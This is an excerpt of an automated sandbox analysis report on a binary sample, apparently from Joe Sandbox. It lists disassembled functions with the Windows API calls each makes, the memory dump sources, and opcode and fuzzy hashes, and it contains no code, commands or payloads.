Function 00BEB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777a327d275b53b69d1e653c412e29f1d461317e1df12bcf37f8af003e9f9d66
Instruction ID: 5d82ce39d085abe7b0819769beb54e2a5c1f3bcab37359539826643ecc913ffb
Opcode Fuzzy Hash: 777a327d275b53b69d1e653c412e29f1d461317e1df12bcf37f8af003e9f9d66
Instruction Fuzzy Hash: C041CFB5A00284AFD7249F79C841BABBBF9EB88710F1045AEF5469B282D771A9058780

Function 00C256D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C25783
GetLastError.KERNEL32(?,00000000), ref: 00C257A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C257CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C257FA

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 3a572a9e500053468d9122a33612a10051b87cdfca2da9f80a385b5226e1a59a
Instruction ID: f8507c7aee62853b58b8867e6eee7ede32d0959da4001e070552eecc1110c1e1
Opcode Fuzzy Hash: 3a572a9e500053468d9122a33612a10051b87cdfca2da9f80a385b5226e1a59a
Instruction Fuzzy Hash: A6413E39610610DFCB21DF15C455A6EBBF2EF99720B18C488E85A9B762CBB4FD40CB91

Function 00BED8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00BD6D71,00000000,00000000,00BD82D9,?,00BD82D9,?,00000001,00BD6D71,8BE85006,00000001,00BD82D9,00BD82D9), ref: 00BED910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BED999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BED9AB
__freea.LIBCMT ref: 00BED9B4

Part of subcall function 00BE3820: RtlAllocateHeap.NTDLL(00000000,?,00C81444,?,00BCFDF5,?,?,00BBA976,00000010,00C81440,00BB13FC,?,00BB13C6,?,00BB1129), ref: 00BE3852

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: b3d25a8f1480ff2f2fcbb4e5abe16be07f2cd7f8cf9ecf7be9175c71fbba7372
Instruction ID: ea5224b4e24b8dc5dae953db82a835bed3f14c676391358ed84acad147595412
Opcode Fuzzy Hash: b3d25a8f1480ff2f2fcbb4e5abe16be07f2cd7f8cf9ecf7be9175c71fbba7372
Instruction Fuzzy Hash: 1431EF72A0024AABDF24DF66DC85EAE7BE5EB41310F0502A9FC04D7261EB75CD50CBA0

Function 00C452C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00C45352
GetWindowLongW.USER32(?,000000F0), ref: 00C45375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C45382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C453A8

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 7ec3fd39bbcce5c1d1550620afb7ccbf1856786ffeeba3a289cca1ec8697fc00
Instruction ID: ffea444e27711bc94ed67c782df3c1ec4ae5188b9cca2869b0cc53c1fb410904
Opcode Fuzzy Hash: 7ec3fd39bbcce5c1d1550620afb7ccbf1856786ffeeba3a289cca1ec8697fc00
Instruction Fuzzy Hash: 2531A035A56A08EFEB309F14CC46BE877A5BB05390F584141FA21962F2C7B4AE80EB41

Function 00C1AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00C1ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C1AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C1AC74
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00C1ACC6

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 690fe6306d43458c5df08ef96a6c5997b4e6dc7e0baf1b4fd14efd90269accc5
Instruction ID: b942868738ef0861be28a7372b644ef0f1457b46f9ce4aeab0f944bf1f140b9d
Opcode Fuzzy Hash: 690fe6306d43458c5df08ef96a6c5997b4e6dc7e0baf1b4fd14efd90269accc5
Instruction Fuzzy Hash: 31310870A017186FEF35CB658C247FE7BA5AB87310F04421AE495922E1D3768AC5A7D2

Function 00C47674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C4769A
GetWindowRect.USER32(?,?), ref: 00C47710
PtInRect.USER32(?,?,00C48B89), ref: 00C47720
MessageBeep.USER32(00000000), ref: 00C4778C

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 1aa512c544e7ca07fb05c6cacbb67e9c26f15e3d2484ca1d95d6100aacdd9068
Instruction ID: 3a550f83879fd79155fdbaf54307a4fcb603fae62381b2fd971a86e89d5bb311
Opcode Fuzzy Hash: 1aa512c544e7ca07fb05c6cacbb67e9c26f15e3d2484ca1d95d6100aacdd9068
Instruction Fuzzy Hash: 55416D38605214DFCB12CF58C894FAD77F9FF49324F5942A9E8249B261C731AA42CF90

Function 00C416DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C416EB

Part of subcall function 00C13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C13A57
Part of subcall function 00C13A3D: GetCurrentThreadId.KERNEL32 ref: 00C13A5E
Part of subcall function 00C13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C125B3), ref: 00C13A65

GetCaretPos.USER32(?), ref: 00C416FF
ClientToScreen.USER32(00000000,?), ref: 00C4174C
GetForegroundWindow.USER32 ref: 00C41752

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 4a74f1cea1aac2ad2d50fe2ab7b739042f0a5af4a9cb3770533288508775c510
Instruction ID: 826fe34a39b402e5027cfff91a709264e0d3a9d9f3825d041ae313cd7bcfdb92
Opcode Fuzzy Hash: 4a74f1cea1aac2ad2d50fe2ab7b739042f0a5af4a9cb3770533288508775c510
Instruction Fuzzy Hash: 0C311D75D00149AFCB00EFA9C8819FEBBF9FF49304B5480AAE455E7211DA759E45CBA0

Function 00C1D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C1D501
Process32FirstW.KERNEL32(00000000,?), ref: 00C1D50F
Process32NextW.KERNEL32(00000000,?), ref: 00C1D52F
CloseHandle.KERNEL32(00000000), ref: 00C1D5DC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 12c5fdea21add67edb045959f100b287c8efca801035b5a3656ef575e7b5f4f5
Instruction ID: 31ee91551b9ce777fd4de20fb1e73525f0442426c96ab8c1f0729fe392c78243
Opcode Fuzzy Hash: 12c5fdea21add67edb045959f100b287c8efca801035b5a3656ef575e7b5f4f5
Instruction Fuzzy Hash: EB318F711083009FD300EF54D881BFFBBE8EF9A354F14096DF586861A1EBB19A85DB92

Function 00C48FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BC9BB2

GetCursorPos.USER32(?), ref: 00C49001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C07711,?,?,?,?,?), ref: 00C49016
GetCursorPos.USER32(?), ref: 00C4905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C07711,?,?,?), ref: 00C49094

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 1e1623b8042478d729b7eadfdc0a839539c7d409abaa4374ed39e9457ad08421
Instruction ID: 3311cc0ca7c75c3a5d23b32dd0f49190b337c86aab5f3fc23fd2d15ed1612bfc
Opcode Fuzzy Hash: 1e1623b8042478d729b7eadfdc0a839539c7d409abaa4374ed39e9457ad08421
Instruction Fuzzy Hash: 56218D35601028AFDB25CF94C899FEF7BB9FB4A360F044059F91547261C7319A51EB60

Function 00C1D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C4CB68), ref: 00C1D2FB
GetLastError.KERNEL32 ref: 00C1D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C1D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C4CB68), ref: 00C1D376

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: b0cc7e7cd83355c5515af69b74c90dcf1d3e9991cfc83d72ef4af7b2ec035a0c
Instruction ID: 3c0b212aca56f58cb883eef6228b7453cfcbae8257863298323413dac8b14e2e
Opcode Fuzzy Hash: b0cc7e7cd83355c5515af69b74c90dcf1d3e9991cfc83d72ef4af7b2ec035a0c
Instruction Fuzzy Hash: 9F217C745092019F8710DF28C8819AE77E4BE56364F504A59F4AAC32B1DB70DA86DB93

Function 00C11571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C1102A
Part of subcall function 00C11014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C11036
Part of subcall function 00C11014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C11045
Part of subcall function 00C11014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C1104C
Part of subcall function 00C11014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C11062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C115BE
_memcmp.LIBVCRUNTIME ref: 00C115E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C11617
HeapFree.KERNEL32(00000000), ref: 00C1161E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 4e86651bf21dce9c8754e16afcbd1d3f8aa606685b6ea776ce5aa1091f29ee46
Instruction ID: 23600c5d282648e18678346b467a0b7058af30505ad5775f7add16d67d15766f
Opcode Fuzzy Hash: 4e86651bf21dce9c8754e16afcbd1d3f8aa606685b6ea776ce5aa1091f29ee46
Instruction Fuzzy Hash: 3B21BD31E01108EFDF00DFA4C944BEEB7B9EF86354F084459E911AB251E735AA85EBA0

Function 00C42782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00C4280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C42824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C42832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C42840

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 511616836a171ab272e3dea59bd063d17651e31f82d337999148e91170451061
Instruction ID: 797155a82c6e1f5938b5e1238285cbc89155c3c769026c14ff209cdf2650af8a
Opcode Fuzzy Hash: 511616836a171ab272e3dea59bd063d17651e31f82d337999148e91170451061
Instruction Fuzzy Hash: ED21D335205111AFD714DB24C886FAE7BA9FF46324F148158F4268B6E2CBB1FD82CB90

Function 00C178F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C18D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C1790A,?,000000FF,?,00C18754,00000000,?,0000001C,?,?), ref: 00C18D8C
Part of subcall function 00C18D7D: lstrcpyW.KERNEL32(00000000,?,?,00C1790A,?,000000FF,?,00C18754,00000000,?,0000001C,?,?,00000000), ref: 00C18DB2
Part of subcall function 00C18D7D: lstrcmpiW.KERNEL32(00000000,?,00C1790A,?,000000FF,?,00C18754,00000000,?,0000001C,?,?), ref: 00C18DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C18754,00000000,?,0000001C,?,?,00000000), ref: 00C17923
lstrcpyW.KERNEL32(00000000,?,?,00C18754,00000000,?,0000001C,?,?,00000000), ref: 00C17949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C18754,00000000,?,0000001C,?,?,00000000), ref: 00C17984

Strings

cdecl, xrefs: 00C1797B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 73fd7c5266879c73769681c558721d21d0b09f7ddbd9165fdd01b065f8476a7d
Instruction ID: 2520c8b99a3185fbac72b42508851a494ce16d1547d6bde5b8d2cc6cd94a8df5
Opcode Fuzzy Hash: 73fd7c5266879c73769681c558721d21d0b09f7ddbd9165fdd01b065f8476a7d
Instruction Fuzzy Hash: 0C11063A200302ABCF15AF34D844EBA77B5FF86350B10412AF906C73A4EB319945E791

Function 00C47CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00C47D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C47D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C47D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C2B7AD,00000000), ref: 00C47D6B

Part of subcall function 00BC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BC9BB2

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 1de0bc628a01fdfd5241c83e177908d9ab2dc2a3df445e9abc35e170ac9fc8ce
Instruction ID: 3227b693be66986a2588e483a0d04abeb72c64ec15b4cb8c8d91deace1c3b9aa
Opcode Fuzzy Hash: 1de0bc628a01fdfd5241c83e177908d9ab2dc2a3df445e9abc35e170ac9fc8ce
Instruction Fuzzy Hash: A0119D35A15615AFCB109F28CC44BAA3BA9BF46360B258724F839D72F0E7349A51DB50

Function 00C45660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00C456BB
_wcslen.LIBCMT ref: 00C456CD
_wcslen.LIBCMT ref: 00C456D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C45816

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 64075dcae4fe18e28b8141aab9afb1356a885514f566a48f30b7802eb35b312c
Instruction ID: 49c6274b0542d538cab833e97f68feacc10cad970e3eafa1f127625e5c54f23f
Opcode Fuzzy Hash: 64075dcae4fe18e28b8141aab9afb1356a885514f566a48f30b7802eb35b312c
Instruction Fuzzy Hash: E211D375A00608ABDF209F62CC85AEE77ACFF11764B104066F925D6182EB70CA85CB64

Function 00BE1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 839eabb4539dbf5351fa8d2ddc788d17b7156583b0ba41a187936fbe9cfa8e3f
Instruction ID: 2b22c1a77bc9831870e14d9141638002ded94d2f1a89b6aaa21dfe3cb3cd1f22
Opcode Fuzzy Hash: 839eabb4539dbf5351fa8d2ddc788d17b7156583b0ba41a187936fbe9cfa8e3f
Instruction Fuzzy Hash: 3201D6B220569A3EF611167E6CC1F2B669CEF813B8F314BB5F531612D2DB758C004170

Function 00BC990F Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,?), ref: 00BC98D6
SetBkMode.GDI32(?,00000001), ref: 00BC98E9
GetStockObject.GDI32(00000005), ref: 00BC98F1
GetWindowLongW.USER32(?,000000EB), ref: 00BC9952

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ColorLongModeObjectStockTextWindow
String ID:
API String ID: 2960364272-0
Opcode ID: ca787dc7bbec775aa9477db5187ae7e220693d519302c51c7fd341f62987a487
Instruction ID: 42262fe47507a267bb505d81ad8aa9ad931c4d3dfc385fa67091a331980f5d5c
